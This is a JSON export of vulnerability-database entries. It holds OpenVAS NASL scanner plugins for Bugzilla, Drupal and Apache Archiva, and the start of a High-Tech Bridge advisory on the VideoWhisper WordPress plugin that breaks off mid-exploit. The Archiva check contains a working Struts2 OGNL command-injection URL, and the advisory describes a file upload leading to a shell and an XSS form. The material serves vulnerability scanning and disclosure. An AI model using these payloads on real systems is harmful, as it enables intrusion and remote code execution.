$\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:12:48 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-1517\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_name(\"Fedora Update for bugzilla FEDORA-2014-5433\");\n\n tag_insight = \"Bugzilla is a popular bug tracking system used by multiple open source projects\nIt requires a database engine installed - either MySQL, PostgreSQL or Oracle.\nWithout one of these database engines (local or remote), Bugzilla will not work\n- see the Release Notes for details.\n\";\n\n tag_affected = \"bugzilla on Fedora 20\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5433\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132309.html\");\n script_summary(\"Check for the Version of bugzilla\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC20\")\n{\n\n if ((res = isrpmvuln(pkg:\"bugzilla\", rpm:\"bugzilla~4.2.9~1.fc20\", rls:\"FC20\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-17T13:37:33", "references": ["http://seclists.org/bugtraq/2014/Apr/121", "http://archiva.apache.org/security.html"], "pluginID": "1361412562310804447", "description": "This host is installed with Apache Archiva and is prone to cross-site scripting\nvulnerability.", "edition": 6, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-05-08T00:00:00", "title": "Apache Archiva Home Page Cross-Site Scripting vulnerability", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2187"], "modified": "2018-09-15T00:00:00", "id": "OPENVAS:1361412562310804447", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310804447", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archiva_home_page_xss_vuln.nasl 11402 2018-09-15 09:13:36Z cfischer $\n#\n# Apache Archiva Home Page Cross-Site Scripting vulnerability\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apache:archiva\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.804447\");\n script_version(\"$Revision: 11402 $\");\n script_cve_id(\"CVE-2013-2187\");\n script_bugtraq_id(66998);\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:N/I:P/A:N\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-15 11:13:36 +0200 (Sat, 15 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-08 17:04:00 +0530 (Thu, 08 May 2014)\");\n script_name(\"Apache Archiva Home Page Cross-Site Scripting vulnerability\");\n\n\n script_tag(name:\"summary\", value:\"This host is installed with Apache Archiva and is prone to cross-site scripting\nvulnerability.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The flaw exists because the home page does not validate input before returning\nit to users.\");\n script_tag(name:\"impact\", value:\"Successful exploitation will allow remote attackers to execute arbitrary\nscript code in a user's browser within the trust relationship between their\nbrowser and the server.\");\n script_tag(name:\"affected\", value:\"Apache Archiva 1.2 through 1.2.2 and 1.3 before 1.3.8\");\n script_tag(name:\"solution\", value:\"Upgrade to Apache Archiva 1.3.8, 2.0.1 or later,\nFor updates refer to http://archiva.apache.org/index.cgi\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n script_xref(name:\"URL\", value:\"http://archiva.apache.org/security.html\");\n script_xref(name:\"URL\", value:\"http://seclists.org/bugtraq/2014/Apr/121\");\n script_category(ACT_GATHER_INFO);\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\");\n script_mandatory_keys(\"apache_archiva/installed\");\n script_require_ports(\"Services/www\", 80, 8080);\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif(!ownPort = get_app_port(cpe:CPE)){\n exit(0);\n}\n\nif(!ownVer = get_app_version(cpe:CPE, port:ownPort)){\n exit(0);\n}\n\nif(version_in_range(version:ownVer, test_version:\"1.2\", test_version2:\"1.2.2\") ||\n version_in_range(version:ownVer, test_version:\"1.3\", test_version2:\"1.3.7\"))\n{\n security_message(port:ownPort);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2018-09-04T13:34:11", "references": ["http://cxsecurity.com/issue/WLB-2014010087", "http://struts.apache.org/release/2.3.x/docs/s2-016.html"], "pluginID": "1361412562310103883", "description": "Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.", "edition": 7, "reporter": "This script is Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-01-15T00:00:00", "title": "Apache Archiva Multiple Remote Command Execution Vulnerabilities", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Web application abuses", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2251"], "modified": "2018-09-03T00:00:00", "id": "OPENVAS:1361412562310103883", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310103883", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_apache_archivo_rce_01_14.nasl 11200 2018-09-03 14:11:38Z mmartin $\n#\n# Apache Archiva Multiple Remote Command Execution Vulnerabilities\n#\n# Authors:\n# Michael Meyer <michael.meyer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\nCPE = \"cpe:/a:apache:archiva\";\n\nif (description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.103883\");\n script_cve_id(\"CVE-2013-2251\");\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_version(\"$Revision: 11200 $\");\n\n script_name(\"Apache Archiva Multiple Remote Command Execution Vulnerabilities\");\n\n\n script_xref(name:\"URL\", value:\"http://cxsecurity.com/issue/WLB-2014010087\");\n script_xref(name:\"URL\", value:\"http://struts.apache.org/release/2.3.x/docs/s2-016.html\");\n\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-03 16:11:38 +0200 (Mon, 03 Sep 2018) $\");\n script_tag(name:\"creation_date\", value:\"2014-01-15 18:13:42 +0100 (Wed, 15 Jan 2014)\");\n script_category(ACT_ATTACK);\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n script_family(\"Web application abuses\");\n script_copyright(\"This script is Copyright (C) 2014 Greenbone Networks GmbH\");\n script_dependencies(\"gb_apache_archiva_detect.nasl\", \"os_detection.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_mandatory_keys(\"apache_archiva/installed\");\n\n script_tag(name:\"impact\", value:\"Successful exploits will allow remote attackers to execute arbitrary\ncommands within the context of the affected application.\");\n script_tag(name:\"vuldetect\", value:\"Send a special crafted HTTP GET request and check the response.\");\n script_tag(name:\"insight\", value:\"Apache Archiva use Apache Struts2:\n'In Struts 2 before 2.3.15.1 the information following 'action:', 'redirect:' or\n'redirectAction:' is not properly sanitized. Since said information will be evaluated as\nOGNL expression against the value stack, this introduces the possibility to inject server\nside code.'\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year since the disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer release, disable respective features, remove the product or replace the product by another one.\");\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"summary\", value:\"Apache Archiva is prone to multiple remote command-execution\nvulnerabilities.\");\n script_tag(name:\"affected\", value:\"Apache Archiva <= 1.3.6\");\n\n exit(0);\n}\n\ninclude(\"misc_func.inc\");\ninclude(\"http_func.inc\");\ninclude(\"host_details.inc\");\ninclude(\"http_keepalive.inc\");\n\n\nif( ! port = get_app_port(cpe:CPE) ) exit (0);\nif( ! dir = get_app_location( cpe:CPE, port:port ) ) exit (0);\n\ncmds = exploit_commands();\n\nforeach cmd ( keys( cmds ) )\n{\n url = dir +\n '/security/login.action?redirect:' +\n '${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{%27' +\n cmds[cmd] +\n '%27})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b)' +\n ',%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23' +\n 'matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23' +\n 'matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}';\n\n if( buf = http_vuln_check( port:port, url:url, pattern:cmd, bodyonly:TRUE ) )\n {\n buf = str_replace( string:buf, find:raw_string( 0x00 ), replace:\"\");\n report = 'It was possible to execute the command \"' + cmds[cmd] + '\" on the remote\\nhost which produces the following output:\\n\\n' + buf + '\\n';\n security_message( port:port, data: report );\n exit (0);\n }\n}\n\nexit (99);\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-07-25T10:48:38", "references": ["2014-5414", "https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132281.html"], "pluginID": "867769", "description": "Check for the Version of bugzilla", "edition": 2, "reporter": "Copyright (C) 2014 Greenbone Networks GmbH", "published": "2014-05-05T00:00:00", "title": "Fedora Update for bugzilla FEDORA-2014-5414", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-1517"], "modified": "2017-07-10T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=867769", "id": "OPENVAS:867769", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for bugzilla FEDORA-2014-5414\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2014 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(867769);\n script_version(\"$Revision: 6629 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:33:41 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2014-05-05 11:17:13 +0530 (Mon, 05 May 2014)\");\n script_cve_id(\"CVE-2014-1517\");\n script_tag(name:\"cvss_base\", value:\"4.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:N/A:N\");\n script_name(\"Fedora Update for bugzilla FEDORA-2014-5414\");\n\n tag_insight = \"Bugzilla is a popular bug tracking system used by multiple open source projects\nIt requires a database engine installed - either MySQL, PostgreSQL or Oracle.\nWithout one of these database engines (local or remote), Bugzilla will not work\n- see the Release Notes for details.\n\";\n\n tag_affected = \"bugzilla on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2014-5414\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2014-April/132281.html\");\n script_summary(\"Check for the Version of bugzilla\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2014 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"bugzilla\", rpm:\"bugzilla~4.2.9~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.0, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-09-01T23:54:34", "references": ["http://www.debian.org/security/2014/dsa-2913.html"], "pluginID": "1361412562310702913", "description": "An information disclosure vulnerability was discovered in Drupal, a\nfully-featured content management framework. When pages are cached for\nanonymous users, form state may leak between anonymous users. Sensitive\nor private information recorded for one anonymous user could thus be\ndisclosed to other users interacting with the same form at the same\ntime.\n\nThis security update introduces small API changes, see the upstream\nadvisory at drupal.org/SA-CORE-2014-002 \nfor further information.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-04-25T00:00:00", "title": "Debian Security Advisory DSA 2913-1 (drupal7 - security update)", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2983"], "modified": "2018-04-06T00:00:00", "id": "OPENVAS:1361412562310702913", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310702913", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2913.nasl 9354 2018-04-06 07:15:32Z cfischer $\n# Auto-generated from advisory DSA 2913-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"drupal7 on Debian Linux\";\ntag_insight = \"Drupal is a dynamic web site platform which allows an individual or\ncommunity of users to publish, manage and organize a variety of\ncontent, Drupal integrates many popular features of content\nmanagement systems, weblogs, collaborative tools and discussion-based\ncommunity software into one easy-to-use package.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 7.14-2+deb7u4.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 7.27-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.27-1.\n\nWe recommend that you upgrade your drupal7 packages.\";\ntag_summary = \"An information disclosure vulnerability was discovered in Drupal, a\nfully-featured content management framework. When pages are cached for\nanonymous users, form state may leak between anonymous users. Sensitive\nor private information recorded for one anonymous user could thus be\ndisclosed to other users interacting with the same form at the same\ntime.\n\nThis security update introduces small API changes, see the upstream\nadvisory at drupal.org/SA-CORE-2014-002 \nfor further information.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.702913\");\n script_version(\"$Revision: 9354 $\");\n script_cve_id(\"CVE-2014-2983\");\n script_name(\"Debian Security Advisory DSA 2913-1 (drupal7 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2018-04-06 09:15:32 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name: \"creation_date\", value:\"2014-04-25 00:00:00 +0200 (Fri, 25 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2913.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2017-07-31T10:48:28", "references": ["http://www.debian.org/security/2014/dsa-2913.html"], "pluginID": "702913", "description": "An information disclosure vulnerability was discovered in Drupal, a\nfully-featured content management framework. When pages are cached for\nanonymous users, form state may leak between anonymous users. Sensitive\nor private information recorded for one anonymous user could thus be\ndisclosed to other users interacting with the same form at the same\ntime.\n\nThis security update introduces small API changes, see the upstream\nadvisory at drupal.org/SA-CORE-2014-002 \nfor further information.", "edition": 3, "reporter": "Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net", "published": "2014-04-25T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "Debian Security Advisory DSA 2913-1 (drupal7 - security update)", "type": "openvas", "naslFamily": "Debian Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2014-2983"], "modified": "2017-07-14T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=702913", "id": "OPENVAS:702913", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2913.nasl 6724 2017-07-14 09:57:17Z teissa $\n# Auto-generated from advisory DSA 2913-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ntag_affected = \"drupal7 on Debian Linux\";\ntag_insight = \"Drupal is a dynamic web site platform which allows an individual or\ncommunity of users to publish, manage and organize a variety of\ncontent, Drupal integrates many popular features of content\nmanagement systems, weblogs, collaborative tools and discussion-based\ncommunity software into one easy-to-use package.\";\ntag_solution = \"For the stable distribution (wheezy), this problem has been fixed in\nversion 7.14-2+deb7u4.\n\nFor the testing distribution (jessie), this problem has been fixed in\nversion 7.27-1.\n\nFor the unstable distribution (sid), this problem has been fixed in\nversion 7.27-1.\n\nWe recommend that you upgrade your drupal7 packages.\";\ntag_summary = \"An information disclosure vulnerability was discovered in Drupal, a\nfully-featured content management framework. When pages are cached for\nanonymous users, form state may leak between anonymous users. Sensitive\nor private information recorded for one anonymous user could thus be\ndisclosed to other users interacting with the same form at the same\ntime.\n\nThis security update introduces small API changes, see the upstream\nadvisory at drupal.org/SA-CORE-2014-002 \nfor further information.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(702913);\n script_version(\"$Revision: 6724 $\");\n script_cve_id(\"CVE-2014-2983\");\n script_name(\"Debian Security Advisory DSA 2913-1 (drupal7 - security update)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-14 11:57:17 +0200 (Fri, 14 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2014-04-25 00:00:00 +0200 (Fri, 25 Apr 2014)\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2014/dsa-2913.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2014 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.2\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"drupal7\", ver:\"7.14-2+deb7u4\", rls:\"DEB7.3\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}], "exploitdb": [{"lastseen": "2016-02-03T15:55:41", "osvdbidlist": ["103427", "103818", "103817", "103821", "103428", "103425", "103814", "103815", "103426", "103819", "103816", "103820"], "references": [], "edition": 1, "description": "Wordpress VideoWhisper 4.27.3 - Multiple Vulnerabilities. CVE-2014-1905,CVE-2014-1906,CVE-2014-1907,CVE-2014-1908. Webapps exploit for php platform", "reporter": "High-Tech Bridge SA", "published": "2014-02-28T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "type": "exploitdb", "title": "WordPress VideoWhisper 4.27.3 - Multiple Vulnerabilities", "bulletinFamily": "exploit", "cvelist": ["CVE-2014-1907", "CVE-2014-1906", "CVE-2014-1905", "CVE-2014-1908"], "modified": "2014-02-28T00:00:00", "id": "EDB-ID:31986", "href": "https://www.exploit-db.com/exploits/31986/", "sourceData": "Advisory ID: HTB23199\r\nProduct: VideoWhisper Live Streaming Integration\r\nVendor: VideoWhisper\r\nVulnerable Version(s): 4.27.3 and probably prior\r\nTested Version: 4.27.3\r\nAdvisory Publication: February 6, 2014 [without technical details]\r\nVendor Notification: February 6, 2014\r\nVendor Patch: February 7, 2014\r\nPublic Disclosure: February 27, 2014\r\nVulnerability Type: Unrestricted Upload of File with Dangerous Type [CWE-434], Cross-Site Scripting [CWE-79], Path Traversal [CWE-22], Information Exposure Through Externally-Generated Error Message [CWE-211]\r\nCVE References: CVE-2014-1905, CVE-2014-1906, CVE-2014-1907, CVE-2014-1908\r\nRisk Level: Critical\r\nCVSSv2 Base Scores: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C), 5 (AV:N/AC:L/Au:N/C:N/I:P/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N), 5 (AV:N/AC:L/Au:N/C:P/I:N/A:N)\r\nSolution Status: Fixed by Vendor\r\nDiscovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )\r\n\r\n------------------------------------------------------------------------\r\n-----------------------\r\n\r\nAdvisory Details:\r\n\r\nHigh-Tech Bridge Security Research Lab discovered multiple vulnerabilities in VideoWhisper Live Streaming Integration, which can be exploited to execute arbitrary code on the target system, gain access to potentially sensitive data, perform Cross-Site Scripting (XSS) attacks against users of vulnerable application and delete arbitrary files.\r\n\r\n1) Arbitrary File Upload in VideoWhisper Live Streaming Integration: CVE-2014-1905\r\n\r\nVideoWhisper Live Streaming Integration does not properly verify malicious file extensions before uploading files to the server in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/vw_snaps\r\nhots.php\". A remote attacker can upload and execute arbitrary PHP file on the target system.\r\n\r\nThe following PoC code demonstrates exploitation of the vulnerability:\r\n\r\nAfter successful exploitation the remote shell will be accessible via the following URL:\r\n\r\nhttp://[host]/wp-content/plugins/videowhisper-live-streaming-integration\r\n/ls/snapshots/1.php.jpg\r\n\r\nSuccessful exploitation of this vulnerability requires that the webserver is not configured to handle the mime-type for media files with .jpg extension.\r\n\r\n2) Cross-Site Scripting (XSS) in VideoWhisper Live Streaming Integration: CVE-2014-1906\r\n\r\n2.1 The vulnerability exists due to insufficient filtration of \"m\" HTTP POST parameter in \"/wp-content/plugins/videowhisper-live-streaming-integration/ls/lb_statu\r\ns.php\" script. A remote attacker can send a specially crafted HTTP POST request to the vulnerable script and permanently inject and execute arbitrary html and script code in browser in context of the vulnerable website when user visits a page with enabled plugin\u00e2??s widget. The script will be also executed in administrative section on the following page:\r\n\r\nhttp://[host]/wp-admin/options-general.php?page=videowhisper_streaming.p\r\nhp&tab=live\r\n\r\nThe exploitation examples below use the \"alert()\" JavaScript function to display \"immuniweb\" word:\r\n\r\n<body onLoad=\"document.hack.submit()\">\r\n<form name=\"hack\" 